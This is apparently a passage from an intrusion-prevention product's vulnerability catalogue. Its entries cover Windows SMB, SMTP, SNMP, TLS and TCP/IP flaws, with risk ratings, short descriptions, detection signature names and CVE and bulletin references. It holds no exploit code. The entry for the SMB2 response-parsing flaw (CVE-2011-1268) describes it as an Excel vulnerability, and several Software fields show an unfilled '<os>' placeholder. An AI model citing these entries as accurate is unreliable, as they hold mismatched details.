Description: There is an authentication reflection vulnerability in Microsoft Windows SMB services. The flaw is due to a weak authentication challenge/response mechanism. Remote unauthenticated attackers can exploit this vulnerability by enticing users to connect to a crafted SMB server, and then connect back to the user's own SMB service using the user's own challenge/response values. A successful exploitation can lead to arbitrary code execution in the security context of the affected user.
Situation: SMB-TCP_Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution
SMB-TCP_CHS-Authentication-Attempt
References:
CVE-2008-4037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4037
BID-7385
http://www.securityfocus.com/bid/7385
OSVDB-49736
http://www.osvdb.org/49736
MS08-068
http://technet.microsoft.com/security/bulletin/MS08-068
Back to top

Microsoft-Windows-Smb-Client-Message-Size-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A remote code execution vulnerability exists in Microsoft Windows SMB Client. The vulnerability is due to improper validation of certain SMB fields when parsing transaction responses. Remote unauthenticated attackers could exploit this vulnerability by enticing a user to connect to a malicious SMB server and sending a specially crafted SMB response to the target machine. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the operating system kernel (Ring 0). Code injection that does not result in execution could crash the target system, and result in a Denial of Service condition.
Situation: NetBIOS-TCP_Microsoft-Windows-Smb-Client-Message-Size-Vulnerability
References:
CVE-2010-0477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0477
MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020
Back to top

Microsoft-Windows-SMB-Client-Pool-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: SMB-TCP_Microsoft-Windows-SMB-Client-Pool-Corruption
References:
CVE-2010-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0016
MS10-006
http://technet.microsoft.com/security/bulletin/MS10-006
Back to top

Microsoft-Windows-SMB-Client-Race-Condition

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-287-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2008; Windows 7
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: SMB-TCP_Microsoft-Windows-SMB-Client-Race-Condition
References:
CVE-2010-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0017
MS10-006
http://technet.microsoft.com/security/bulletin/MS10-006
Back to top

Microsoft-Windows-Smb-Client-Response-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft Windows SMB Client. The vulnerability is due to improper validation of certain SMB fields when parsing transaction responses. Remote unauthenticated attackers could exploit this vulnerability by enticing a user to connect to a malicious SMB server and sending a specially crafted SMB response to the target machine. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the operating system kernel (Ring 0). Code injection that does not result in execution could crash the target system, and result in a Denial of Service condition.
Situation: SMB-TCP_Microsoft-Windows-Smb-Client-Response-Parsing-Memory-Corruption
References:
CVE-2010-0476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0476
BID-39336
http://www.securityfocus.com/bid/39336
MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020
Back to top

Microsoft-Windows-SMB-Client-Transaction-BOF-CVE-2010-0270

About this vulnerability: A buffer overflow vulnerability in Microsoft Windows SMB Client
Risk: Critical
First detected in: sgpkg-ips-302-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2008; Windows 7
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Windows SMB Client. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to connect to a malicious SMB server, and sending a specially crafted SMB response to the target machine.
Situation: SMB-TCP_Microsoft-Windows-SMB-Client-Transaction-BOF-Exploit-CVE-2010-0270
References:
CVE-2010-0270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0270
BID-39339
http://www.securityfocus.com/bid/39339
OSVDB-62046
http://www.osvdb.org/62046
MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020
Back to top

Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28324

About this vulnerability: A vulnerability in microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1339-5242
Last changed: sgpkg-ips-1339-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an uninitialized memory vulnerability in Microsoft Windows. Successful exploitation could lead in information disclosure.
Situation: SMB-TCP_SHS-Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28324
References:
CVE-2021-28324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324
ms21-apr
http://technet.microsoft.com/security/bulletin/ms21-apr
Back to top

Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28325

About this vulnerability: A vulnerability in microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1339-5242
Last changed: sgpkg-ips-1339-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an uninitialized memory vulnerability in Microsoft Windows. Successful exploitation could lead in information disclosure.
Situation: SMB-TCP_SHS-Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28325
References:
CVE-2021-28325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325
ms21-apr
http://technet.microsoft.com/security/bulletin/ms21-apr
Back to top

Microsoft-Windows-SMB-Negoex-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1549-5242
Last changed: sgpkg-ips-1549-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: The SPNEGO Extended Negotiation (NEGOEX) Security Mechanism, which allows a client and server to negotiate the choice of security mechanism to use has a vulnerability that may allow a remote attacker to execute arbitrary code on the target system or gian access to information thereon.
Situation: SMB-TCP_CHS-Microsoft-Windows-Negoex-Buffer-Overflow
References:
CVE-2022-37958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37958
Back to top

Microsoft-Windows-SMB-Negotiate-Request-Remote-Code-Execution

About this vulnerability: A Remote exploitable vulnerability in SMB protocol
Risk: Critical
First detected in: sgpkg-ips-243-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A vulnerability has been reported in Microsoft Server Message Block (SMB) Protocol that could allow remote attackers to execute arbitrary code on the vulnerable system due to memory corruption. The vulnerability is due to incorrectly indexing an array when handling specially crafted SMB packets. Remote attackers could exploit this vulnerability by sending a specially crafted network message to a computer running the Server service. Successful exploitation would allow for arbitrary code injection and execution with the privileges of System. Code injection that does not result in execution could crash the target system, and result in a Denial of Service condition. Products Directly Affected by the Vulnerability are Microsoft Windows 7, Microsoft Windows Vista and Microsoft Windows Server 2008.
Situation: SMB-TCP_Negotiate-Protocol-Smb2-Remote-Code-Execution
References:
CVE-2009-3103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
BID-36299
http://www.securityfocus.com/bid/36299
OSVDB-57799
http://www.osvdb.org/57799
MS09-050
http://technet.microsoft.com/security/bulletin/MS09-050
Back to top

Microsoft-Windows-SMB-Search-Request-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Windows SMB services.
Situation: SMB-TCP_Microsoft-Windows-SMB-Search-Request-Buffer-Overflow
References:
CVE-2008-4038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4038
BID-31647
http://www.securityfocus.com/bid/31647
MS08-063
http://technet.microsoft.com/security/bulletin/MS08-063
Back to top

Microsoft-Windows-SMB-Server-Denial-Of-Service-CVE-2010-0022

About this vulnerability: A denial of service vulnerability in Microsoft Windows SMB server
Risk: High
First detected in: sgpkg-ips-283-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a denial of service vulnerability in Microsoft Windows SMB server.
Situation: SMB-TCP_Microsoft-Windows-SMB-Server-Denial-Of-Service-CVE-2010-0022
References:
CVE-2010-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0022
MS10-012
http://technet.microsoft.com/security/bulletin/MS10-012
Back to top

Microsoft-Windows-SMB-Server-Ntlm-Authentication-Lack-Of-Entropy

About this vulnerability: An NTLM authentication bypass vulnerability in Microsoft Windows SMB server
Risk: High
First detected in: sgpkg-ips-284-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is an NTLM authentication bypass vulnerability in Microsoft Windows SMB server. A remote unauthenticated attacker can exploit this vulnerability to access the SMB service under the credentials of an authorized user. Depending on the privileges of the user and the system configuration, an attacker may obtain read/write access to the files system and execute arbitrary code by deploying DCE/RPC over SMB.
References:
CVE-2010-0231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0231
MS10-012
http://technet.microsoft.com/security/bulletin/MS10-012
Back to top

Microsoft-Windows-SMB-Server-Remote-Code-Execution-CVE-2010-0020

About this vulnerability: A buffer overflow vulnerability in Microsoft Windows SMB server
Risk: High
First detected in: sgpkg-ips-283-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Windows SMB server. An authenticated remote attacker can send specially crafted SMB packets to compromise the vulnerable system.
Situation: SMB-TCP_CHS-Microsoft-Windows-SMB-Server-Remote-Code-Execution-MS10-012
References:
CVE-2010-0020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0020
BID-38049
http://www.securityfocus.com/bid/38049
MS10-012
http://technet.microsoft.com/security/bulletin/MS10-012
Back to top

Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in the SMBv1 component of Microsoft Windows SMB server.
Situation: SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption
SMB-TCP_SS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption
References:
CVE-2017-0143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010
Back to top

Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Critical
First detected in: sgpkg-ips-920-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in SMBv1. This vulnerability was utilized by the EternalBlue exploit which has been used as part of the WannaCry ransomware.
Situation: SMB-TCP_Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
SMB-TCP_CHS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
Generic_CS-DoublePulsar-Shellcode
References:
CVE-2017-0144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144
MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010
Back to top

Microsoft-Windows-SMB-Server-Smbv1-CVE-2017-0145-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper handling of SMBv1 requests causes a buffer overflow vulnerability in Windows. A successful exploitation allows an attacker to run arbitrary code with system privileges.
Situation: SMB-TCP_Microsoft-Windows-SMB-Server-Smbv1-CVE-2017-0145-Buffer-Overflow
References:
CVE-2017-0145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145
MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010
Back to top

Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0146-RCE

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in the SMBv1 component of Microsoft Windows SMB server.
Situation: SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0146-RCE
References:
CVE-2017-0146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146
MS17-010
http://technet.microsoft.com/security/bulletin/MS17-010
Back to top

Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure

About this vulnerability: A Microsoft Windows SMB Server Smbv1 Information Disclosure vulnerability
Risk: High
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An information disclosure vulnerability in Microsoft Windows SMB Server, in multiple Windows versions, which allows remote attackers to gain sensitive information by sending a crafted SMBv1 request.
Situation: SMB-TCP_CS-Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure
References:
CVE-2017-0271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271
Back to top

Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure-2

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Exploiting a vulnerability in the SMB server component of Microsoft Windows may lead to disclosure of information due to improper handling of SMBv1 requests.
Situation: SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-Information-Disclosure-2
References:
CVE-2017-11815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11815
Back to top

Microsoft-Windows-SMB-Server-Smbv1-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-927-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper processing of SMBv1 protocol messages causes an out-of-bounds read vulnerability in Windows. A successful exploit allows an attacker to gain access to sensitive information which may help further attacks.
Situation: SMB-TCP_CHS-Microsoft-Windows-SMB-Server-Smbv1-Out-Of-Bounds-Read
References:
CVE-2017-0267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267
Back to top

Microsoft-Windows-Smb-Server-Smbv1-Out-Of-Bounds-Read-CVE-2017-11781

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote attacker could exploit an out ouf bounds vulnerability, which is due to improper handling of SMBv1 requests.
Situation: SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-Out-Of-Bounds-Read
References:
CVE-2017-11781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11781
Back to top

Microsoft-Windows-SMB-Service-Buffer-Overflow-MS08-063

About this vulnerability: A buffer overflow vulnerability in Microsoft Windows SMB service
Risk: High
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A buffer overlfow vulnerability exists in Microsoft Windows SMB services. The flaw is due insufficient input validation when handling file names. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code excution with System level privileges.
Situation: SMB-TCP_SMB-Search-Buffer-Overflow-MS08-063
References:
CVE-2008-4038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4038
BID-31647
http://www.securityfocus.com/bid/31647
MS08-063
http://technet.microsoft.com/security/bulletin/MS08-063
Back to top

Microsoft-Windows-SMB-Transaction-CVE-2011-0661

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: NetBIOS-TCP_SMB2-Microsoft-Windows-SMB-Transaction-CVE-2011-0661
References:
CVE-2011-0661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0661
BID-47198
http://www.securityfocus.com/bid/47198
OSVDB-71781
http://www.osvdb.org/71781
MS11-020
http://technet.microsoft.com/security/bulletin/MS11-020
Back to top

Microsoft-Windows-SMB2-DFS-DOS

About this vulnerability: A Denial of Service vulnerability in SMB2 protocol
Risk: Moderate
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a remote unauthenticated vulnerability in SMBv2 that can lead to a CPU exhaustion on the host and force a reboot.
Situation: NetBIOS-TCP_SMB2-DFS-DOS-MS09-050
References:
CVE-2009-2526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2526
MS09-050
http://technet.microsoft.com/security/bulletin/MS09-050
Back to top

Microsoft-Windows-SMB2-Response-Parsing-Vulnerability-CVE-2011-1268

About this vulnerability: An attempt to exploit a Windows SMB2 parsing vulnerability
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Vulnerability in Microsoft Excel
Situation: NetBIOS-TCP_Microsoft-Windows-SMB2-Response-Parsing-Vulnerability-CVE-2011-1268
References:
CVE-2011-1268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1268
MS11-043
http://technet.microsoft.com/security/bulletin/MS11-043
Back to top

Microsoft-Windows-SMB2-Write-DOS-CVE-2011-1267

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: NetBIOS-TCP_SMB2-Microsoft-Windows-SMB2-Write-CVE-2011-1267
NetBIOS-TCP_SMB-Microsoft-Windows-SMB-DOS-CVE-2011-1267
References:
CVE-2011-1267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1267
MS11-048
http://technet.microsoft.com/security/bulletin/MS11-048
Back to top

Microsoft-Windows-Smbv1-CVE-2017-0147-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-901-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper validation of SMBv1 messages causes an information disclosure vulnerability in Windows. A remote attacker can use a crafted SMB message to gain access to information on the server.
Situation: SMB-TCP_CHS-Microsoft-Windows-Smbv1-CVE-2017-0147-Information-Disclosure
References:
CVE-2017-0147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147
Back to top

Microsoft-Windows-SMBv2-Smb2updateleasefilename-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: Improper handling of SMBv2 requests causes a vulnerability in Windows. A successful exploit may allow an attacker to execute code on the target system.
Situation: SMB-TCP_CHS-Microsoft-Windows-SMBv2-Smb2updateleasefilename-Code-Execution
References:
CVE-2019-0630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0630
Back to top

Microsoft-Windows-SMBv3-Compression-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability has been reported in the SMBv3 component of Microsoft Windows SMB. The vulnerability is due to improper handling of compressed SMB v3 packets. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted SMBv3 packets to exploit a server. Successful exploitation results in the disclosure of information which could be used to obtain information to further compromise the user's system.
Situation: SMB-TCP_Microsoft-Windows-SMBv3-Compression-Information-Disclosure
References:
CVE-2020-1206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1206
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a spoofing vulnerability in Microsoft Windows Simple Mail Transfer Protocol (SMTP) Service. The vulnerability is due to insufficient validation of DNS responses to queries made by the SMTP service. Successful exploitation of this vulnerability could allow remote unauthenticated attackers to cause redirection of email traffic.
Situation: DNS-UDP_Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing
DNS-UDP_Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing-2
References:
CVE-2010-1690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1690
BID-39910
http://www.securityfocus.com/bid/39910
MS10-024
http://technet.microsoft.com/security/bulletin/MS10-024
Back to top

Microsoft-Windows-SMTP-Service-MX-Record-Denial-Of-Service

About this vulnerability: An attempt to exploit vulnerability in Windows SMTP service detected
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows 2008
Software: Exchange Server 2000; Exchange Server 2003
Type: Malfunction
Description: A denial of service vulnerability has been reported in Microsoft Windows Simple Mail Transfer Protocol (SMTP) service. The vulnerability is due to a memory access error when handling DNS Mail Exchanger (MX) resource records. An attacker can exploit this vulnerability by sending a specifically crafted response to an MX resource record query.
Situation: DNS-UDP_Microsoft-Windows-SMTP-Service-MX-Record-Denial-Of-Service
References:
CVE-2010-0024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0024
OSVDB-63738
http://www.osvdb.org/63738
MS10-024
http://technet.microsoft.com/security/bulletin/MS10-024
Back to top

Microsoft-Windows-SNMP-CVE-2018-0967-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A denial of service vulnerability has been reported in the SNMP Service of Microsoft Windows. The vulnerability is due to improper handling of malformed SNMP traps. A remote attacker could exploit this vulnerability by sending specially crafted SNMP traps to the target system. Successful exploitation could result in denial of service conditions.
Situation: SNMP-UDP_Microsoft-Windows-SNMP-CVE-2018-0967-Denial-Of-Service
References:
CVE-2018-0967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0967
ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct
Back to top

Microsoft-Windows-Ssl-And-Tls-Security-Feature-Bypass

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a security feature bypass vulnerability in Microsoft Windows. The vulnerability is caused by the way that Windows handles SSL/TLS session version negotiation. By injecting malformed traffic into an SSL version 3 or TLS session, a man-in-the-middle attacker can exploit this vulnerability to silently downgrade the connection to SSL version 2.
Situation: TLS_SSL-2-0
References:
CVE-2013-0013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0013
BID-57144
http://www.securityfocus.com/bid/57144
OSVDB-88967
http://www.osvdb.org/88967
MS13-006
http://technet.microsoft.com/security/bulletin/MS13-006
Back to top

Microsoft-Windows-StructuredQuery-RCE-Vulnerability-CVE-2018-0825

About this vulnerability: A vulnerability in Microsoft Internet Explorer 11
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There has been reported an integer overflow in the StructuredQuery.dll. A remote attacker could exploit this vulnerability by having a target user receive a maliciously crafted .lnk file to the target system. Successful exploitation could lead to remote code execution.
Situation: File-Binary_Microsoft-Windows-StructuredQuery-RCE-Vulnerability-CVE-2018-0825
References:
CVE-2018-0825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0825
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Windows-StructuredQuery-Uninitialized-Pointer-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper handling of LNK files causes an uninitialized pointer vulnerability in Windows. A successful exploit may allow an attacker to run code on the target system.
Situation: File-Binary_Microsoft-Windows-StructuredQuery-Uninitialized-Pointer-Remote-Code-Execution
References:
CVE-2018-8345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8345
Back to top

Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1491-5242
Last changed: sgpkg-ips-1500-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A directory traversal vulnerability CVE-2022-34713 has been reported in Microsoft Windows Support Diagnostic Tool. The vulnerability is due to improper validation of ".diagcab" files. A remote attacker could exploit this vulnerability by enticing a user into opening a crafted ".diagcab" file. Successful exploitation could allow the attacker to execute arbitrary code under the context of the user.
Situation: SMB-TCP_SS-Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
SMB-TCP_SS-Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713-2
File-TextId_Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
References:
CVE-2022-34713
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34713
ms22-aug
http://technet.microsoft.com/security/bulletin/ms22-aug
Back to top

Microsoft-Windows-TCP-FIN-WAIT-Vulnerability

About this vulnerability: Vulnerability in Windows TCP/IP could allow Denial Of Service
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Windows TCP/IP that could allow Denial Of Service.
Situation: TCP_Window-Shrinked
References:
CVE-2013-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0075
MS13-018
http://technet.microsoft.com/security/bulletin/MS13-018
Back to top

Microsoft-Windows-TCP-IP-Stack-Url-Based-Qos-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability exists in Microsoft Windows TCP/IP stack URL based Quality of Service (QoS). When URL based QoS in enabled on a machine that is also hosting web content, the TCP/IP stack fails to properly handle long URLs in memory. A remote unauthenticated attacker can exploit this vulnerability by sending network traffic with specially crafted URLs to a vulnerable service. Successful exploitation could cause the affected machine to become non-responsive and restart.
Situation: HTTP_CSU-Microsoft-Windows-TCP-IP-Stack-Url-Based-Qos-Denial-Of-Service
References:
CVE-2011-1965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1965
BID-48990
http://www.securityfocus.com/bid/48990
MS11-064
http://technet.microsoft.com/security/bulletin/MS11-064
Back to top

Microsoft-Windows-TCP-Stack-Zero-Window-Size-Vulnerability

About this vulnerability: A Microsoft Windows TCP Stack Zero Window Size vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Malfunction
Description: A vulnerability in Microsoft Windows which allows remote attackers to cause a denial of service condition by flooding a host with a large number of TCP connections and keeping these connections alive, due to the way the vulnerable product handles an excessive number of established TCP connections.
Situation: HTTP_CS-Microsoft-Windows-TCP-Stack-Zero-Window-Size-Vulnerability
References:
CVE-2008-4609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4609
Back to top

Microsoft-Windows-Telnet-Credential-Reflection-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is an authentication reflection vulnerability in Telnet implementation included within Microsoft Windows. The vulnerability exists because Telnet does not correctly opt-in to NTLM credential-reflection protection methods to ensure that a user's credentials are not reflected back and used against the user. Remote attackers could exploit this vulnerability by persuading a target user to connect to a malicious Telnet server and reflecting the user credentials back to certain services, typically SMB, on the target. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the target user.
Situation: Analyzer_Telnet-SMB-Bidirectional-Authentication
Telnet_CCS-NTLM-Authentication-Usage
References:
CVE-2009-1930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1930
BID-35993
http://www.securityfocus.com/bid/35993
OSVDB-56904
http://www.osvdb.org/56904
